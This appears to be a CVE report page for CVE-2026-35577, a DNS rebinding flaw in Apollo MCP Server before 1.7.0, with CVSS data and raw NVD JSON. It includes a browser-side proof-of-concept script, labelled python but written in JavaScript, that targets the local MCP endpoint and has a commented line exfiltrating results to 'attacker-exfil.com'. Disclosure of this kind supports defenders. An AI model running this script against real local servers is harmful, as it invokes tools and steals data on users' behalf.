Security Vulnerability Report
中文
CVE-2026-35577 CVSS 6.8 MEDIUM

CVE-2026-35577

Published: 2026-04-09 20:16:26
Last Modified: 2026-04-17 17:31:24
Source: [email protected]

Description

Apollo MCP Server is a Model Context Protocol server that exposes GraphQL operations as MCP tools. Prior to version 1.7.0, the Apollo MCP Server did not validate the Host header on incoming HTTP requests when using StreamableHTTP transport. In configurations where an HTTP-based MCP server is run on localhost without additional authentication or network-level controls, this could potentially allow a malicious website—visited by a user running the server locally—to use DNS rebinding techniques to bypass same-origin policy restrictions and issue requests to the local MCP server. If successfully exploited, this could allow an attacker to invoke tools or access resources exposed by the MCP server on behalf of the local user. This issue is limited to HTTP-based transport modes (StreamableHTTP). It does not affect servers using stdio transport. The practical risk is further reduced in deployments that use authentication, network-level access controls, or are not bound to localhost. This vulnerability is fixed in 1.7.0.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apollographql:apollo_mcp_server:*:*:*:*:*:*:*:* - VULNERABLE
Apollo MCP Server < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Conceptual PoC for DNS Rebinding against Apollo MCP Server * This script runs in the victim's browser context. */ async function attackLocalMCP() { // The domain 'attacker.com' is controlled by the attacker and performs DNS rebinding. // Initially resolves to attacker's IP, then rebinding to 127.0.0.1. const targetUrl = 'http://attacker.com/mcp/stream'; // Example payload to list available tools or read files const maliciousPayload = { jsonrpc: "2.0", id: 1, method: "tools/list", params: {} }; try { // Attempt to send request to the local server via the rebinding domain const response = await fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(maliciousPayload) }); if (response.ok) { const data = await response.json(); console.log("[+] Exploit Successful! Data:", data); // Exfiltrate data to attacker's server // fetch('https://attacker-exfil.com/steal', { method: 'POST', body: JSON.stringify(data) }); } else { console.log("[-] Request failed, waiting for DNS rebind..."); } } catch (error) { console.log("[-] Error (likely due to SOP not bypassed yet):", error); } } // Polling to wait for DNS rebinding to occur setInterval(attackLocalMCP, 3000);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35577", "sourceIdentifier": "[email protected]", "published": "2026-04-09T20:16:25.987", "lastModified": "2026-04-17T17:31:24.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apollo MCP Server is a Model Context Protocol server that exposes GraphQL operations as MCP tools. Prior to version 1.7.0, the Apollo MCP Server did not validate the Host header on incoming HTTP requests when using StreamableHTTP transport. In configurations where an HTTP-based MCP server is run on localhost without additional authentication or network-level controls, this could potentially allow a malicious website—visited by a user running the server locally—to use DNS rebinding techniques to bypass same-origin policy restrictions and issue requests to the local MCP server. If successfully exploited, this could allow an attacker to invoke tools or access resources exposed by the MCP server on behalf of the local user. This issue is limited to HTTP-based transport modes (StreamableHTTP). It does not affect servers using stdio transport. The practical risk is further reduced in deployments that use authentication, network-level access controls, or are not bound to localhost. This vulnerability is fixed in 1.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apollographql:apollo_mcp_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.0", "matchCriteriaId": "8F975CB2-D811-487F-BBC4-D66D069AACBD"}]}]}], "references": [{"url": "https://github.com/apollographql/apollo-mcp-server/pull/602", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/apollographql/apollo-mcp-server/pull/635", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/apollographql/apollo-mcp-server/security/advisories/GHSA-wqrj-vp8w-f8vh", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.